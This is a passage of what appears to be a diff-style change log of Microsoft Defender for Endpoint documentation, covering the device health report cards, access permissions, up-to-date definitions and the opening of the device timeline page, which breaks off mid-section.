-In the Microsoft 365 Security dashboard navigation panel, select **Reports**, and then open **Device health and compliance**. The [**Microsoft Defender Antivirus health** tab](#microsoft-defender-antivirus-health-tab) has eight cards that report on the following aspects of Microsoft Defender Antivirus:
--- [Antivirus mode card](#antivirus-mode-card)-- [Antivirus engine version card](#antivirus-engine-version-card)-- [Antivirus security intelligence version card](#antivirus-security-intelligence-version-card)-- [Antivirus platform version card](#antivirus-platform-version-card)-- [Recent antivirus scan results card](#recent-antivirus-scan-results-card)-- [Antivirus engine updates card](#antivirus-engine-updates-card)-- [Security intelligence updates card](#security-intelligence-updates-card)-- [Antivirus platform updates card](#antivirus-platform-updates-card)-
-## Report access permissions
-
-To access the Device health and antivirus compliance report in the Microsoft 365 Security dashboard, the following permissions are required:
-
-| Permission name | Permission type |
-|:|:|
-| View Data | Threat and vulnerability management (TVM) |
-
-To Assign these permissions:
-
-1. Sign in to <a href="https://go.microsoft.com/fwlink/p/?linkid=2077139" target="_blank">Microsoft Defender XDR</a> using account with Security administrator or Global administrator role assigned.
-1. In the navigation pane, select **Settings** \> **Endpoints** \> **Roles** (under **Permissions**).
-1. Select the role you'd like to edit.
-1. Select **Edit**.
-1. In **Edit role**, on the **General** tab, in **Role name**, type a name for the role.
-1. In **Description** type a brief summary of the role.
-1. In **Permissions**, select **View Data**, and under **View Data** select **Threat and vulnerability management** (TVM).
-
-For more information about user role management, see [Create and manage roles for role-based access control](user-roles.md).
-
-## Microsoft Defender Antivirus health tab
-
-The Microsoft Defender Antivirus health tab contains eight cards that report on several aspects of Microsoft Defender Antivirus in your organization:
-
-Two cards, [Antivirus mode card](#antivirus-mode-card) and [Recent antivirus scan results card](#recent-antivirus-scan-results-card), report about Microsoft Defender Antivirus functions.
-
-The remaining six cards report about the Microsoft Defender Antivirus status for devices in your organization:
-
-| _version_ cards: | _update_ cards{<a id="fn1">1</a>} |
-|:|:|
-| [Antivirus engine version card](#antivirus-engine-version-card) <br> [Antivirus security intelligence version card](#antivirus-security-intelligence-version-card) <br> [Antivirus platform version card](#antivirus-platform-version-card) | [Antivirus engine updates card](#antivirus-engine-updates-card) <br> [Security intelligence updates card](#security-intelligence-updates-card) <br> [Antivirus platform updates card](#antivirus-platform-updates-card) |
-| The three version cards provide flyout reports that provide additional information, and enable further exploration. | The three up-to-date reporting cards provide links to resources to learn more. |
-
-<sup>{[1](#fn1)}</sup> For the three _updates_ cards (also known as up-to-date reporting cards), "**No data available**" (or "Unknown" value) indicates devices that aren't reporting update status. Devices that aren't reporting update status can be due to various reasons, such as:
--- Computer is disconnected from the network.-- Computer is powered down or in a hibernation state.-- Microsoft Defender Antivirus is disabled.-- Device is a non-Windows (Mac or Linux) device.-- Cloud protection isn't enabled.-- Device doesn't meet pre-requisites for Antivirus engine or platform version.-
-### Prerequisites
-
-Up-to-date reporting generates information for devices that meet the following criteria:
--- Engine version: 1.1.19300.2+-- Platform version: 4.18.2202.1+-- Cloud protection enabled-- Sense (MsSense.exe): **10.8210.** \*+-- Windows OS - Windows 10 1809 or later-
- > [!NOTE]
- > \* Currently up to date reporting is only available for Windows devices. Cross platform devices such as Mac and Linux are listed under "No data available"/Unknown.
--
-### Card functionality
-
-The functionality is essentially the same for all cards. By clicking on a numbered bar in any of the cards, the **Microsoft Defender Antivirus details** flyout opens enabling you to review information about all the devices configured with the version number of an aspect on that card.
--
-If the version number that you clicked on is:
--- A current version, then **Remediation required** and **Security recommendation** aren't present.-- An outdated version, a notification at the top of the report is present, indicating **Remediation required**, and a **Security recommendation** link is present. Select the security recommendation link to navigate to the threat and vulnerability management console, which can recommend appropriate antivirus updates.-
-To add or remove specific types of information on the **Microsoft Defender Antivirus details** flyout, select **Customize Columns**. In **Customize Columns**, select or clear items to specify what you want included in the Microsoft Defender Antivirus details report.
--
-#### New Microsoft Defender Antivirus filter definitions
-
-The following table contains a list of terms that are new to Microsoft Defender Antivirus reporting.
-
-| Column name | Description |
-|:|:|
-| Security intelligence publish time | Indicates Microsoft's release date of the security intelligence update version on the device. Devices with a security intelligence publish time greater than seven days are considered out of date in the reports. |
-| Last seen | Indicates date when device last had connection. |
-| Data refresh timestamp | Indicates when client events were last received for reporting on: AV mode, AV engine version, AV platform version, AV security intelligence version, and scan information. |
-| Signature refresh time | Indicates when client events were last received for reporting on engine, platform, and signature up to date status. |
-
-Within the flyout: clicking on the name of the device will redirect you to the "Device page" for that device, where you can access detailed reports.
-
-#### Export report
-
-There are two levels of reports that you can export:
-
-##### Top level export
-
-There are two different export csv functionalities through the portal:
--- **Top level export**. You can use the top-level **Export** button to gather an all-up Microsoft Defender Antivirus health report (500-K limit).---- **Flyout level export**. You can use the **Export** button within the flyouts to export a report to an Excel spreadsheet (100-K limit).-
-Exported reports capture information based on your entry point into the details report and which filters or customized columns you have set.
-
-For information on exporting using API, see the following articles:
--- [Export device antivirus health report](device-health-export-antivirus-health-report-api.md)-- [Export device antivirus health details API methods and properties](device-health-api-methods-properties.md)-
-> [!IMPORTANT]
->
-> Currently, only the [Antivirus Health JSON Response](device-health-api-methods-properties.md#13-export-device-antivirus-health-details-api-properties-json-response) is generally available. [Antivirus Health API via files](device-health-api-methods-properties.md#14-export-device-antivirus-health-details-api-properties-via-files) is only available in public preview.
->
-> [Advanced Hunting custom query](run-advanced-query-api.md) is currently only available in public preview, even if the queries are visible.
-
-### Microsoft Defender Antivirus version and update cards functionality
-
-Following are descriptions for the six cards that report about the _version_ and _update_ information for Microsoft Defender Antivirus engine, security intelligence, and platform components:
-
-#### Full report
-
-In any of the three _version_ cards, select **View full report** to display the nine most recent Microsoft Defender Antivirus _version_ reports for each of the three device types: Windows, Mac, and Linux; if fewer than nine exist, they're all shown. An **Other** category captures recent antivirus engine versions ranking tenth and below, if detected.
--
-A primary benefit of the three _version_ cards is that they provide quick indicators as to whether the most current versions of the antivirus engines, platforms, and security intelligence are being utilized. Coupled with the detailed information that is linked to the card, the versions cards become a powerful tool to check if versions are up to date and to gather information about individual computers, or groups of computers.
-Ideally, when you run these reports, they'll indicate that the most current antivirus versions are installed, as opposed to older versions.
-Use these reports to determine whether your organization is taking full advantage of the most current versions.
--
-To help ensure your anti-malware solution detects the latest threats, get updates automatically as part of Windows Update.
-
-For more details on the current versions and how to update the different Microsoft Defender Antivirus components, visit [Microsoft Defender Antivirus platform support](microsoft-defender-antivirus-updates.md).
-
-### Card descriptions
-
-Following are brief summaries of the collected information reported in each of the _Antivirus version_ cards:
-
-#### Antivirus mode card
-
-Reports on how many devices in your organization ΓÇô on the date indicated on the card ΓÇô are in any of the following Microsoft Defender Antivirus modes:
-
-| value | mode |
-|||
-| 0 | Active |
-| 1 | Passive |
-| 2 | Disabled (uninstalled, disabled, or SideBySidePassive {also known as Low Periodic Scan}) |
-| 3 | Others (Not running, Unknown) |
-| 4 | EDRBlocked |
--
-Following are descriptions for each mode:
--- **Active** mode - In active mode, Microsoft Defender Antivirus is used as the primary antivirus app on the device. Files are scanned, threats are remediated, and detected threats are listed in your organization's security reports and in your Windows Security app.-- **Passive** mode - In passive mode, Microsoft Defender Antivirus isn't used as the primary antivirus app on the device. Files are scanned, and detected threats are reported, but threats aren't remediated by Microsoft Defender Antivirus. IMPORTANT: Microsoft Defender Antivirus can run in passive mode only on endpoints that are onboarded to Microsoft Defender for Endpoint. See [Requirements for Microsoft Defender Antivirus to run in passive mode](microsoft-defender-antivirus-compatibility.md#requirements-for-microsoft-defender-antivirus-to-run-in-passive-mode).-- **Disabled** mode - synonymous with: uninstalled, disabled, sideBySidePassive, and Low Periodic Scan. When disabled, Microsoft Defender Antivirus isn't used. Files aren't scanned, and threats aren't remediated. In general, Microsoft doesn't recommend disabling or uninstalling Microsoft Defender Antivirus.-- **Others** mode - Not running, Unknown-- **EDR in Block** mode - In endpoint detection and response (EDR) blocked mode. See [Endpoint detection and response in block mode](edr-in-block-mode.md)-
-Devices that are in either passive, LPS, or Off present a potential security risk and should be investigated.
-
-For details about LPS, see [Use limited periodic scanning in Microsoft Defender Antivirus](limited-periodic-scanning-microsoft-defender-antivirus.md).
-
-#### Recent antivirus scan results card
-
-This card has two bars graphs showing all-up results for quick scans and full scans. In both graphs, the first bar indicates the completion rate for scans, and indicate **Completed**, **Canceled**, or **Failed**. The second bar in each section provides the error codes for failed scans.
-By scanning the **Mode** and **Recent scan results** columns, you can quickly identify devices that aren't in active antivirus scan mode, and devices that have failed or canceled recent antivirus scans. You can return to the report with this information and gather more details and security recommendations. If any error codes are reported in this card, there will be a link to learn more about error codes.
-
-For more details on the current Microsoft Defender Antivirus versions and how to update the different Microsoft Defender Antivirus components, visit [Manage Microsoft Defender Antivirus updates and apply baselines](microsoft-defender-antivirus-updates.md).
-
-#### Antivirus engine version card
-
-Shows the real-time results of the most current Microsoft Defender Antivirus engine versions installed across Windows Devices, Mac devices, and Linux devices in your organization. Microsoft Defender Antivirus engine is updated monthly.
-For more information on the current versions and how to update the different Microsoft Defender Antivirus components, see [Microsoft Defender Antivirus platform support](microsoft-defender-antivirus-updates.md).
-
-#### Antivirus security intelligence version card
-
-Lists the most common _Microsoft Defender Antivirus security intelligence_ versions installed on devices on your network.
-Microsoft continually updates Microsoft Defender security intelligence to address the latest threats, and to refine detection logic. These refinements to security intelligence enhance Microsoft Defender Antivirus' (and other Microsoft anti-malware solutions') ability to accurately identify potential threats. This security intelligence works directly with cloud-based protection to deliver AI-enhanced, next-generation protection that is fast and powerful.
-
-##### Antivirus platform version card
-
-Shows the real-time results of the most current Microsoft Defender Antivirus platform versions installed across versions of Windows, Mac, and Linux devices in your organization. Microsoft Defender Antivirus platform is updated monthly.
-For more information on the current versions and how to update the different Microsoft Defender Antivirus components, see [Microsoft Defender Antivirus platform support](microsoft-defender-antivirus-updates.md)
-
-#### Up-to-date cards
-
-The up-to-date cards show the up-to-date status for **Antivirus engine**, **Antivirus platform**, and **Security intelligence** update versions. There are three possible states: _Up to date_ ('True'), _out of date_ ('False'), and _no data available_ ('Unknown').
-
-> [!IMPORTANT]
->
-> The logic used to make up-to-date determinations has recently been enhanced and simplified. The new behavior is documented in this section.
-
-Definitions for _Up to date_, _out of date_, and _no data available_ are provided for each card below.
-
-Microsoft Defender Antivirus uses the additional criteria of "Signature refresh time" (the last time device communicated with up to date reports) to make up-to-date reports and determinations for engine, platform, and security intelligence updates.
-
-The up-to-date status is automatically marked as "unknown" or "no data available" if the device hasn't communicated with reports for more than seven days (signature refresh time >7).
-
-For more information about the aforementioned terms, refer back to the section: [New Microsoft Defender Antivirus filter definitions](#new-microsoft-defender-antivirus-filter-definitions)
-
-> [!NOTE]
->
-> Up to date reporting **prerequisites**
->
-> Up to date reporting generates information for devices that meet the following criteria:
->
-> - Engine version: 1.1.19300.2+
-> - Platform version: 4.18.2202.1+
-> - Cloud protection enabled
-> - Windows OS*
->
->*Currently up to date reporting is only available for Windows devices. Cross platform devices such as Mac and Linux are listed under "no data available"
->
-
-##### Up-to-date definitions
-
-Following are up-to-date definitions for engine and platform:
-
-| The engine/platform on the device is considered: | Situation |
-|:|:|
-| **up to date** | If the device communicated with the Defender report event ('Signature refresh time') within last seven days, and the Engine or Platform build version is greater than or equal to (`>=`) the most recent monthly release version. |
-| **out-of-date** | If the device communicated with the Defender report event ('Signature refresh time') within last seven days, but Engine or Platform build version is less than (`<`) the most recent monthly release version. |
-| **unknown (no data available)** | If the device hasn't communicated with the report event ('Signature refresh time') for more than seven days. |
-
-Following is the definitions for up-to-date security intelligence:
-
-| The security intelligence update is considered: | Situation |
-|:|:|
-|**up to date** | If the security intelligence version on the device was written in the past seven days and the device has communicated with the report event in past seven days. |
-
-For more information, see:
--- [Antivirus engine updates card](#antivirus-engine-updates-card)-- [Security intelligence updates card](#security-intelligence-updates-card)-- [Antivirus platform updates card](#antivirus-platform-updates-card)-
-##### Antivirus engine updates card
-
-This card identifies devices that have antivirus engine versions that are up to date versus out of date.
-
-**The general definition of 'up to date'** - The engine version on the device is the most recent engine release. The engine is _typically_ released monthly, via Windows Update (WU)). There's a three-day grace period given from the day when Windows Update (WU) is released.
-
-The following table lays out the possible values for up to date reports for **Antivirus Engine**. Reported Status is based on the last time reporting event was received (_signature refresh time_). If the device hasn't communicated with reports for more than seven days (signature refresh time >7 days), then the status is automatically marked as 'Unknown' / 'No Data Available'.
-
-| Event's Last Refresh Time (also known as "Signature Refresh Time" in reports) | _Reported Status_: |
-|:-|:-|
-| < 7 days (new) | whatever client reports (_Up to date <br/> Out of date <br/> Unknown)_ |
-| > 7 days (old) | _Unknown_ |
-
-For information about Manage Microsoft Defender Antivirus update versions, see [Monthly platform and engine versions](microsoft-defender-antivirus-updates.md#monthly-platform-and-engine-versions).
-
-#### Antivirus platform updates card
-
-This card identifies devices that have Antivirus platform versions that are up to date versus out of date.
-
-**The general definition of 'up to date'** is that the platform version on the device is the most recent platform release. Platform is _typically_ released monthly, via Windows Update (WU). There's a three-day grace period from the day when WU is released.
-
-The following table lays out the possible up to date report values for **Antivirus Platform**. Reported values are based on the last time reporting event was received (signature refresh time). If the device hasn't communicated with reports for more than seven days (signature refresh time >7 days) then the status is automatically marked as 'Unknown'/ 'No Data Available'.
-
-| Event's Last Refresh Time (also known as "Signature Refresh Time" in reports) | _Reported Status_ |
-|:-|:-|
-| < 7 days (new) | whatever client reports (_Up to date <br/> Out of date <br/> Unknown)_ |
-| > 7 days (old) | _Unknown_ |
-
-For information about Manage Microsoft Defender Antivirus update versions, see [Monthly platform and engine versions](microsoft-defender-antivirus-updates.md#monthly-platform-and-engine-versions).
-
-##### Security intelligence updates card
-
-This card identifies devices that have security intelligence versions that are up to date versus out of date.
-
-**The general definition of 'up to date'** is that the security intelligence version on the device was written in the past 7 days.
-
-The following table lays out the possible up to date report values for **Security Intelligence** updates. Reported values are based on the last time reporting event was received, and the security intelligence publish time. If the device hasn't communicated with reports for more than seven days (signature refresh time >7 days), then the status is automatically marked as 'Unknown/ No Data Available'. Otherwise, the determination is made based on whether the security intelligence publish time is within seven days.
-
-| Event's Last Refresh Time <br/> (Also known as "Signature Refresh Time" in reports) | Security Intelligence Publish Time | _Reported Status_ |
-|:-|:-|:-|
-| >7 days (old) | >7 days (old) | _Unknown_ |
-| <7 days (new) | >7 days (old) | _Out of date_ |
-| >7 days (old) | <7 days (new) | _Unknown_ |
-| <7 days (new) | <7 days (new) | Up to date |
-
-## See also
-
-> [!TIP]
-> **Performance tip** Due to a variety of factors (examples listed below) Microsoft Defender Antivirus, like other antivirus software, can cause performance issues on endpoint devices. In some cases, you might need to tune the performance of Microsoft Defender Antivirus to alleviate those performance issues. Microsoft's **Performance analyzer** is a PowerShell command-line tool that helps determine which files, file paths, processes, and file extensions might be causing performance issues; some examples are:
->
-> - Top paths that impact scan time
-> - Top files that impact scan time
-> - Top processes that impact scan time
-> - Top file extensions that impact scan time
-> - Combinations ΓÇô for example:
-> - top files per extension
-> - top paths per extension
-> - top processes per path
-> - top scans per file
-> - top scans per file per process
->
-> You can use the information gathered using Performance analyzer to better assess performance issues and apply remediation actions.
-> See: [Performance analyzer for Microsoft Defender Antivirus](tune-performance-defender-antivirus.md).
--- [Export device antivirus health details API methods and properties](device-health-api-methods-properties.md)-- [Export device antivirus health report](device-health-api-methods-properties.md)-- [Threat protection report](threat-protection-reports.md)-
-> [!TIP]
-> For antivirus-related information for other platforms, see:
->
-> - [Set preferences for Microsoft Defender for Endpoint on macOS](mac-preferences.md)
-> - [Microsoft Defender for Endpoint on Mac](microsoft-defender-endpoint-mac.md)
-> - [macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune](/mem/intune/protect/antivirus-microsoft-defender-settings-macos)
-> - [Set preferences for Microsoft Defender for Endpoint on Linux](linux-preferences.md)
-> - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md)
-> - [Configure Defender for Endpoint on Android features](android-configure.md)
-> - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
security Device Health Reports https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/device-health-reports.md
- Title: Device health reporting in Microsoft Defender for Endpoint
-description: Use the device health report to track device health, antivirus status and versions, OS platforms, and Windows 10 versions.
---
-localization_priority: Normal
Previously updated : 09/06/2022 ---- m365-security-- tier2-----
-# Device health reports in Microsoft Defender for Endpoint
-
-**Applies to:**
--- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- [Microsoft Defender for Endpoint](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Business](../defender-business/mdb-overview.md)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
-The Device Health report provides information about the devices in your organization. The report includes trending information showing the sensor health state, antivirus status, OS platforms, Windows 10 versions, and Microsoft Defender Antivirus update versions.
-
-> [!IMPORTANT]
-> For Windows&nbsp;Server&nbsp;2012&nbsp;R2 and Windows&nbsp;Server&nbsp;2016 to appear in device health reports, these devices must be onboarded using the modern unified solution package. For more information, see [New functionality in the modern unified solution for Windows Server 2012 R2 and 2016](/microsoft-365/security/defender-endpoint/configure-server-endpoints#new-windows-server-2012-r2-and-2016-functionality-in-the-modern-unified-solution).
-
-In the Microsoft 365 Security dashboard navigation panel, select **Reports**, and then open **Device health and compliance**.
-The Device health and compliance dashboard is structured in two tabs:
--- The [**Sensor health & OS** tab](device-health-sensor-health-os.md#sensor-health--os-tab) provides general operating system information, divided into three cards that display the following device attributes:
- - [Sensor health card](device-health-sensor-health-os.md#sensor-health-card)
- - [Operating systems and platforms card](device-health-sensor-health-os.md#operating-systems-and-platforms-card)
- - [Windows versions card](device-health-sensor-health-os.md#windows-versions-card)
--- The [**Microsoft Defender Antivirus health** tab](device-health-microsoft-defender-antivirus-health.md#microsoft-defender-antivirus-health-tab) has eight cards that report on aspects of Microsoft Defender Antivirus:
- - [Antivirus mode card](device-health-microsoft-defender-antivirus-health.md#antivirus-mode-card)
- - [Antivirus engine version card](device-health-microsoft-defender-antivirus-health.md#antivirus-engine-version-card)
- - [Antivirus security intelligence version card](device-health-microsoft-defender-antivirus-health.md#antivirus-security-intelligence-version-card)
- - [Antivirus platform version card](device-health-microsoft-defender-antivirus-health.md#antivirus-platform-version-card)
- - [Recent antivirus scan results card](device-health-microsoft-defender-antivirus-health.md#recent-antivirus-scan-results-card)
- - [Antivirus engine updates card](device-health-microsoft-defender-antivirus-health.md#antivirus-engine-updates-card)
- - [Security intelligence updates card](device-health-microsoft-defender-antivirus-health.md#security-intelligence-updates-card)
- - [Antivirus platform updates card](device-health-microsoft-defender-antivirus-health.md#antivirus-platform-updates-card)
-
-## Report access permissions
-
-To access the Device health and antivirus compliance report in the Microsoft 365 Security dashboard, the following permissions are required:
-
-| Permission name | Permission type |
-|:|:|
-| View Data | Threat and vulnerability management (TVM) |
-
-To Assign these permissions:
-
-1. Sign in to <a href="https://go.microsoft.com/fwlink/p/?linkid=2077139" target="_blank">Microsoft Defender XDR</a> using account with Security administrator or Global administrator role assigned.
-1. In the navigation pane, select **Settings** \> **Endpoints** \> **Roles** (under **Permissions**).
-1. Select the role you'd like to edit.
-1. Select **Edit**.
-1. In **Edit role**, on the **General** tab, in **Role name**, type a name for the role.
-1. In **Description** type a brief summary of the role.
-1. In **Permissions**, select **View Data**, and under **View Data** select **Threat and vulnerability management** (TVM).
-
-## See also
-
-> [!TIP]
-> **Performance tip** Due to a variety of factors (examples listed below) Microsoft Defender Antivirus, like other antivirus software, can cause performance issues on endpoint devices. In some cases, you might need to tune the performance of Microsoft Defender Antivirus to alleviate those performance issues. Microsoft's **Performance analyzer** is a PowerShell command-line tool that helps determine which files, file paths, processes, and file extensions might be causing performance issues; some examples are:
->
-> - Top paths that impact scan time
-> - Top files that impact scan time
-> - Top processes that impact scan time
-> - Top file extensions that impact scan time
-> - Combinations ΓÇô for example:
-> - top files per extension
-> - top paths per extension
-> - top processes per path
-> - top scans per file
-> - top scans per file per process
->
-> You can use the information gathered using Performance analyzer to better assess performance issues and apply remediation actions.
-> See: [Performance analyzer for Microsoft Defender Antivirus](tune-performance-defender-antivirus.md).
->
--- [Create and manage roles for role-based access control](user-roles.md).-- [Export device antivirus health details API methods and properties](device-health-api-methods-properties.md)
security Device Health Sensor Health Os https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/device-health-sensor-health-os.md
- Title: Device health Sensor health & OS report
-description: Use the device health report to track device health, OS platforms, and Windows 10 versions.
---
-localization_priority: Normal
Previously updated : 09/06/2022 ---- m365-security-- tier2-----
-# Device health, Sensor health & OS report
-
-**Applies to:**
--- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- [Microsoft Defender for Endpoint](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Business](../defender-business/mdb-overview.md)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
-The Device Health report provides information about the devices in your organization. The report includes trending information showing the sensor health state, antivirus status, OS platforms, Windows 10 versions, and Microsoft Defender Antivirus update versions.
-
-> [!IMPORTANT]
-> For Windows&nbsp;Server&nbsp;2012&nbsp;R2 and Windows&nbsp;Server&nbsp;2016 to appear in device health reports, these devices must be onboarded using the modern unified solution package. For more information, see [New functionality in the modern unified solution for Windows Server 2012 R2 and 2016](/microsoft-365/security/defender-endpoint/configure-server-endpoints#new-windows-server-2012-r2-and-2016-functionality-in-the-modern-unified-solution).
-
-In the Microsoft 365 Security dashboard navigation panel, select **Reports**, and then open **Device health and compliance**.
--- The [**Sensor health & OS** tab](#sensor-health--os-tab) provides general operating system information, divided into three cards that display the following device attributes:
- - [Sensor health card](#sensor-health-card)
- - [Operating systems and platforms card](#operating-systems-and-platforms-card)
- - [Windows versions card](#windows-versions-card)
-
-## Report access permissions
-
-To access the Device health and antivirus compliance report in the Microsoft 365 Security dashboard, the following permissions are required:
-
-| Permission name | Permission type |
-|:|:|
-| View Data | Threat and vulnerability management (TVM) |
-
-To Assign these permissions:
-
-1. Sign in to <a href="https://go.microsoft.com/fwlink/p/?linkid=2077139" target="_blank">Microsoft Defender XDR</a> using account with Security administrator or Global administrator role assigned.
-1. In the navigation pane, select **Settings** \> **Endpoints** \> **Roles** (under **Permissions**).
-1. Select the role you'd like to edit.
-1. Select **Edit**.
-1. In **Edit role**, on the **General** tab, in **Role name**, type a name for the role.
-1. In **Description** type a brief summary of the role.
-1. In **Permissions**, select **View Data**, and under **View Data** select **Threat and vulnerability management** (TVM).
-
-For more information about user role management, see [Create and manage roles for role-based access control](user-roles.md).
-
-## Sensor health & OS tab
-
-Sensor health and OS cards report on general operating system health, which includes detection sensor health, up to date versus out-of-date operating systems, and Windows 10 versions.
-
->:::image type="content" source="media/device-health-sensor-health-os-tab.png" alt-text="Shows Sensor health and Operating system information." lightbox="media/device-health-sensor-health-os-tab.png":::
-
-Each of the three cards on the **Sensor health** tab has two reporting sections, _Current state_ and _device trends_, presented as graphs:
-
-### Current state graph
-
-In each card, the Current state (referred to in some documentation as _Device summary_) is the top, horizontal bar graph. Current state is a snapshot that shows information collected about devices in your organization, scoped to the current day. This graph represents the distribution of devices across your organization that report status or are detected to be in a specific state.
-
->:::image type="content" source="media/device-health-sensor-health-os-current-state-graph.png" alt-text="Shows the current state graph." lightbox="media/device-health-sensor-health-os-current-state-graph.png":::
-
-### Device trends graph
-
-The lower graph on each of the three cards isn't named, but is commonly known as _device trends_. The device trends graph depicts the collection of devices across your organization, throughout the time span indicated directly above the graph.
-By default, the device trends graph displays device information from the 30-day period, ending in the latest full day. To gain a better perspective about trends occurring in your organization, you can fine-tune the reporting period by adjusting the time period shown. To adjust the time period, open the filter and select a start day and end day.
-
->:::image type="content" source="media/device-health-sensor-health-os-device-trends-graph.png" alt-text="Shows the Device Health versions trends graph." lightbox="media/device-health-sensor-health-os-device-trends-graph.png":::
-
-### Filtering data
-
-Use the provided filters to include or exclude devices with certain attributes. You can select multiple filters to apply from the device attributes. When applied, filters apply to all three cards in the report.
-
-For example, to show data about Windows 10 devices with Active sensor health state:
-
-1. Under **Filters** > **Sensor health state** > **Active**.
-2. Then select **OS platforms** > **Windows 10**.
-3. Select **Apply**.
-
-### Sensor health card
-
-The Sensor health card displays information about the sensor state on devices. Sensor health provides an aggregate view of devices that are:
--- active-- inactive-- experiencing impaired communications-- or where no sensor data is reported-
-Devices that are either experiencing impaired communications, or devices from which no sensor data is detected could expose your organization to risks, and warrant investigation. Likewise, devices that are inactive for extended periods of time could expose your organization to threats due to out-of-date software. Devices that are inactive for long periods of time also warrant investigation.
-
-> [!NOTE]
->
-> In a small percentage of cases, the numbers and distributions reported when clicking on the horizontal Sensor health bar graph will be out of synch with the values shown in the **Device inventory** page. The disparity in values can occur because the Sensor Health Reports has a different refresh cadence than the Device Inventory page.
-
-### Operating systems and platforms card
-
-This card shows the distribution of operating systems and platforms that exist within your organization.
-_OS systems and platforms_ can give useful insights into whether devices in your organization are running current or outdated operating systems. When new operating systems are introduced, security enhancements are frequently included that improve your organization's posture against security threats.
-
-For example, Secure Boot (introduced in Windows 8) practically eliminated the threat from some of the most harmful types of malware. Improvements in Windows 10 provide PC manufacturers the option to prevent users from disabling Secure Boot. Preventing users from disabling Secure Boot removes almost any chance of malicious rootkits or other low-level malware from infecting the boot process.
-
-Ideally, the "Current state" graph shows that the number of operating systems is weighted in favor of more current OS over older versions. Otherwise, the trends graph indicates that new systems are being adopted and/or older systems are being updated or replaced.
-
-### Windows versions card
-
-The Windows 10 versions card shows the distribution of Windows devices and their versions in your organization.
-In the same way that an upgrade from Windows 8 to Windows 10 improves security in your organization, changing from early releases of Windows to more current versions improves your posture against possible threats.
-
-The Windows version trend graph can help you quickly determine whether your organization is keeping current by updating to the most recent, most secure versions of Windows 10.
-
-## See also
-
-> [!TIP]
-> **Performance tip** Due to a variety of factors (examples listed below) Microsoft Defender Antivirus, like other antivirus software, can cause performance issues on endpoint devices. In some cases, you might need to tune the performance of Microsoft Defender Antivirus to alleviate those performance issues. Microsoft's **Performance analyzer** is a PowerShell command-line tool that helps determine which files, file paths, processes, and file extensions might be causing performance issues; some examples are:
->
-> - Top paths that impact scan time
-> - Top files that impact scan time
-> - Top processes that impact scan time
-> - Top file extensions that impact scan time
-> - Combinations ΓÇô for example:
-> - top files per extension
-> - top paths per extension
-> - top processes per path
-> - top scans per file
-> - top scans per file per process
->
-> You can use the information gathered using Performance analyzer to better assess performance issues and apply remediation actions.
-> See: [Performance analyzer for Microsoft Defender Antivirus](tune-performance-defender-antivirus.md).
->
-
-[Microsoft Defender Antivirus health](device-health-microsoft-defender-antivirus-health.md#microsoft-defender-antivirus-health-tab)
security Device Timeline Event Flag https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/device-timeline-event-flag.md
- Title: Microsoft Defender for Endpoint device timeline
-description: Use Microsoft Defender for Endpoint device timeline and timeline event flags.
-keywords: Defender for Endpoint device timeline, event flags
-------- m365-security-- tier2-- Previously updated : 11/06/2023--
-# Microsoft Defender for Endpoint device timeline
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> [!NOTE]
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-assignaccess-abovefoldlink)
-
-The Defender for Endpoint device timeline helps you research and investigate anomalous behavior on your devices more quickly. You can explore specific events and endpoints to review potential attacks in your organization. You can review specific times of each event, set flags to follow up for potentially connected events, and filter to specific date ranges.
--- Custom time range picker:-
- :::image type="content" source="media/custom-time-range.png" alt-text="Screenshot of the custom time range.":::
--- Process tree experience ΓÇô event side panel:-
- :::image type="content" source="media/event-side-panel.png" alt-text="Screenshot of the event side panel." lightbox="media/event-side-panel.png":::
-
-
-- All MITRE techniques are shown when there's more than one related technique:-
- :::image type="content" source="media/new-timeline-mitre-techniques.png" alt-text="Screenshot of all MITRE techniques. " lightbox="media/new-timeline-mitre-techniques.png":::
--- Timeline events are linked to the new user page:-
- :::image type="content" source="media/new-timeline-user.png" alt-text="Screenshot of timeline events linked to the new user page." lightbox="media/new-timeline-user.png":::
-
- :::image type="content" source="media/new-timeline-user-details.png" alt-text="Screenshot of timeline events linked to the new user page 2." lightbox="media/new-timeline-user-details.png":::
--- Defined filters are now visible at the top of the timeline: -
- :::image type="content" source="media/new-timeline-highlight.png" alt-text="Screenshot of defined filters." lightbox="media/new-timeline-highlight.png":::
-
-## Techniques in the device timeline
-
-You can gain more insight in an investigation by analyzing the events that happened on a specific device. First, select the device of interest from the [Devices list](machines-view-overview.md). On the device page, you can select the **Timeline** tab to view all the events that occurred on the device.
-
-### Understand techniques in the timeline
-
-> [!IMPORTANT]
